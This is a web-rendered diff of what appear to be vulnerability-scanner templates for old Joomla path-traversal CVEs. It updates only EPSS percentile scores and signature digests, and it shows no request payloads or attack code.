# digest: 490a00463044022032d1e3dbbc70cabe90cfc7b27040f65cf5a0aadeba67a4bb00db6d70dd4baa7802207d1dc06e7205121f53189b66e7453f9313f28d049819f594a0b03e9d961a3bcc:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a0048304602210082875f53a168ec50ad28dae32e85b83ef69e213f228d7801a1e7f07d1f9b6720022100ce9b363a128d6c1b98933763e235c2178fb7140e25fe72e4886c4855c4e0156e:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -17,7 +17,7 @@ info:
|
|||
cve-id: CVE-2010-0985
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.01222
|
||||
epss-percentile: 0.83774
|
||||
epss-percentile: 0.8377
|
||||
cpe: cpe:2.3:a:chris_simon:com_abbrev:1.1:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -40,4 +40,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 4b0a00483046022100d235d52e27e298610411d343527a1339fad7288013862686e0020ed61f9fc5480221008e549ef834fd5cb8eb5344bc803a1dcd6550be6c2556fc3570ab65660306bcdd:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a004630440220235971386e14949900a97e194e4a0c2889c12815e852216465b8c944f6cc899202200f8045bdee3af22a312b637b0986b4d56ecc72716fbe06c72e69f4f9260f606c:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -17,7 +17,7 @@ info:
|
|||
cve-id: CVE-2010-1056
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.06484
|
||||
epss-percentile: 0.92981
|
||||
epss-percentile: 0.92984
|
||||
cpe: cpe:2.3:a:rockettheme:com_rokdownloads:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -40,4 +40,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 4a0a0047304502203bb6b9f517370f9899af62a32a1d0a9fc260d7afc0e4bc130d5bd4265063214b022100c76fdbeea1b75d43f13fce80e1eaf46cb54a5b3bf5cea49892fcd00176e2e396:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a0046304402202e0ceced1240e71565b99950ad6bfa7e26a0851ca6b6ed37b3e861968fa58868022009c78aa734ba92f4627ec326451c1d6e895630feaada4c177955200cc3ebecf6:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -16,7 +16,7 @@ info:
|
|||
cve-id: CVE-2010-1081
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.0168
|
||||
epss-percentile: 0.86262
|
||||
epss-percentile: 0.8627
|
||||
cpe: cpe:2.3:a:corejoomla:com_communitypolls:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -39,4 +39,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 4b0a00483046022100dc050473c391127adf0f162fc8d23b1ba5450473db9426f50a10c4da4033105d02210090c87e1d1c3dfac3830dfb9352da32b3f5b78ac2dc7ca45ebea552ad795b0e64:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100edb7e9dac7ab6a5bdd26b19d909e268752b4c23d93da16155e87803d9e4c0b5802204f3bf397dd6861e3a176e7de568d010feabd2b91a37e40045bfb75462956ba8f:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -17,7 +17,7 @@ info:
|
|||
cve-id: CVE-2010-1217
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.01155
|
||||
epss-percentile: 0.83233
|
||||
epss-percentile: 0.83238
|
||||
cpe: cpe:2.3:a:je_form_creator:je_form_creator:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -40,4 +40,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 4a0a0047304502201b4f8a1c4b7b1a8202bf4601411605895eb31b56edea56dcc3acefae66ffcd40022100954d036e31cbffeaf52147fae52c40b1e4b64a866c0906929e34358338597957:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a00463044022036e13de9a3aeabfccbf67af713caae3dc0a461a775b3fe4f0cd3f59846efe127022074f179d8569413ec885f3ae95fba614b05f7959609debdaca5d69dca111a104f:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -16,7 +16,7 @@ info:
|
|||
cve-id: CVE-2010-1219
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.00813
|
||||
epss-percentile: 0.79822
|
||||
epss-percentile: 0.79832
|
||||
cpe: cpe:2.3:a:com_janews:com_janews:1.0:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -39,4 +39,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 4a0a0047304502207e24f281dc7f287112d151f1b3970eda5ec42e5a5374882a991d22cbd732a973022100cfe03d01aa2cec74d35473021099ea4547143cad675ddbaeceaffa923df5850d:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a0047304502207b401d0eae70f394d2370e0aee61439e5aa1013affa5b521d200ec1144793a390221009d27e28ef9e2afb083648ddfd2fe94a26e644ecf56dad36d610182960a1192e7:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -15,7 +15,7 @@ info:
|
|||
cve-id: CVE-2010-1302
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.01204
|
||||
epss-percentile: 0.83639
|
||||
epss-percentile: 0.83638
|
||||
cpe: cpe:2.3:a:decryptweb:com_dwgraphs:1.0:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -38,4 +38,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 4a0a00473045022100bec691476f135e0e76a4f5e50e5b2d99fd52f61d59e5f29073514caf6c691d24022042af2ccf6829d123d30361e14c714b00ad1785e686cf37250eb31abc607d7bd4:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a0048304602210092922879eb8b1f980d9d84ad505fc7b7f6b55aae5eef42290397d44aaf38f518022100d235aec90fa5735d8805912416417a470e7c08d867705c1d1e121811e3be86eb:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -17,7 +17,7 @@ info:
|
|||
cve-id: CVE-2010-1304
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.0045
|
||||
epss-percentile: 0.72276
|
||||
epss-percentile: 0.72295
|
||||
cpe: cpe:2.3:a:joomlamo:com_userstatus:1.21.16:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -40,4 +40,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 490a0046304402200c8967bb4987c5b36abee0347525a625e4fe3cd0b607bb3687c73120c1cf6aec02206fdd0fadbabb2d64e262983c8617339763324cccd2403ca855343d8e61a4f4c7:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a0047304502203bc27df08be0e41a386d97c5410fa3687ffe8da8e1766b3fdd3e5975cfe637ec022100a28695bfc8dc6f07d0b0f80a79ea4ccfd35137d0fa884eeb6614f4cfecff5770:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -41,4 +41,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 490a004630440220786d60b76154c0b3203c1faae7807c980132d91461fd3081ff5114d98265ea4402201f358b4d607d05ec4e56dc3d9ed0a1ae3e1ca231944550fff526392562183b5d:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100bc3fa7df7541125c278fceb868999f9d06c14e5b720706c47bc82492fa76ac9f022100c894c6f606573acde66f664a8df6cf3fdb6685bccaa6fb52e0e05dddfc7b5f55:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -16,7 +16,7 @@ info:
|
|||
cve-id: CVE-2010-1306
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.01242
|
||||
epss-percentile: 0.83939
|
||||
epss-percentile: 0.83937
|
||||
cpe: cpe:2.3:a:roberto_aloi:com_joomlapicasa2:2.0.0:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -39,4 +39,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 4a0a00473045022022cb72039afbd2888476774513a461bf1104d0418f88fdcd093139d1703677d80221009fa8f309138c629e6d68aeda879ecbde8a61c0f81fdf5b2950e7cf52af4e97ad:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a004730450220784518638be32f5b9339abf2302f3730166790ef7b3bf24f1ebd3a4289a9bdea0221009036c73124e910b416cf3c56a5638945bf8dced2a16a36f22074605171ec6c09:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -17,7 +17,7 @@ info:
|
|||
cve-id: CVE-2010-1307
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.01751
|
||||
epss-percentile: 0.86546
|
||||
epss-percentile: 0.86548
|
||||
cpe: cpe:2.3:a:software.realtyna:com_joomlaupdater:1.0:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -40,4 +40,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 4a0a004730450221009c323be16acc1788891e6241425bedbcc53711ec2e84cb9ccfc404ee6a09339702202ed6b8dd84851f775dfbc698ddfd625c08708583e92fc22101635ea84f688607:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a00473045022100ba2a80125154546e908b78e742a8c2b0fe123a6411f0ad304a870370bc94100502203a789ed0b8831f5f346969b7ebd1d0910ed7f4f8df8ce915cf287433671168ae:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -16,7 +16,7 @@ info:
|
|||
cve-id: CVE-2010-1308
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.01334
|
||||
epss-percentile: 0.84556
|
||||
epss-percentile: 0.84559
|
||||
cpe: cpe:2.3:a:la-souris-verte:com_svmap:1.1.1:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -39,4 +39,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 4a0a004730450220129a63189e7f6a4ab266562bb212f56a40142f4e9e3ea16da16ef0887aaa7f930221008f47946557e3db24fbe3beb82aeed5cbcec6edd44e3b78a711c2b57ab8d1547d:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100f737f1fd4665951f345dfabc188fd9a62d95003cc756df488475ffd4ebcf94510221008ce8eb414ef8c75ca037edfb5b6d3c667fc25845cb95315e9b94874d994445a0:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -16,7 +16,7 @@ info:
|
|||
cve-id: CVE-2010-1312
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.01155
|
||||
epss-percentile: 0.83233
|
||||
epss-percentile: 0.83238
|
||||
cpe: cpe:2.3:a:ijoomla:com_news_portal:1.5.1:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -39,4 +39,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 4b0a00483046022100cee0991c40e3bc41f78e5182e05a2c910f5bd087cb85f893437e8aceb5c5655a022100bbd8b0316104cf27f5a2ca47a23ae33072fef64bc565c0b936c09377a26d6ff1:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a0046304402202576b69ba6c664341369030f571794ac8296f47cd274225ef3cd56f90cb42f34022071a6c15ea50c9a3ce7af1239dc675c67fe69b4d60b54ae9c8364c52e632b0e7b:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -16,7 +16,7 @@ info:
|
|||
cve-id: CVE-2010-1313
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.0045
|
||||
epss-percentile: 0.72276
|
||||
epss-percentile: 0.72295
|
||||
cpe: cpe:2.3:a:seber:com_sebercart:1.0.0.12:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -39,4 +39,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 4a0a00473045022100833171f30916addb28c875ddab95b3b6d9a48d845ace492a80d2b16753a69b1b02206918d139a410f592a2780d9d6dcd87841b0e44181ae9de008186c75de7dafe52:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4a0a0047304502205c1293f96828f2934006bf359f293f2bc6deaf3c0c0380d5d6de619c1310e3470221009dce6b29dd04f902793939e5ad1dabbb27f29ab6a5dd86c0773ac7f0a0843915:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -16,7 +16,7 @@ info:
|
|||
cve-id: CVE-2010-1314
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.00477
|
||||
epss-percentile: 0.73043
|
||||
epss-percentile: 0.73062
|
||||
cpe: cpe:2.3:a:joomlanook:com_hsconfig:1.5:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -39,4 +39,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 4b0a00483046022100f54d0b0ce09632835216670fad8cca6e3e7f2c575b104e096aaa682c636cce88022100b08279fea3cd1b6a1baf44fa491673f205ce69d6c3094681dfe523410907569d:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a0046304402200d4c2b2c1cf6bf118a10ea491f0d152de6190d89bafe7f381f4c0334da124dec0220722f886bc850287d4ab6ca81fc44d565dcffda6d90fe7ad071bee445a2238334:922c64590222798bb761d5b6d8e72950
|
||||
|
|
|
@ -17,7 +17,7 @@ info:
|
|||
cve-id: CVE-2010-1315
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.0087
|
||||
epss-percentile: 0.80505
|
||||
epss-percentile: 0.80511
|
||||
cpe: cpe:2.3:a:joomlamo:com_weberpcustomer:1.2.1:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
max-request: 1
|
||||
|
@ -40,4 +40,4 @@ http:
|
|||
status:
|
||||
- 200
|
||||
|
||||
# digest: 4a0a004730450220112bd65b180180f61c74d84e3581406cf64cd54f9da047224f9ed7a1ddb59d1a022100d14f8e725f7a952f582086ca8d82e8a4216f4a48e93d22d343b3bf9f466abc93:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 490a004630440220701462cf0aa058ccd1a5e2167f42638ba198e88d994541f8dc6136f2501832d2022029820d79e1fec4622f1d3eb6309273f4f48327dd023f302a5f1c3e4833116a4a:922c64590222798bb761d5b6d8e72950
|
||||
|
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue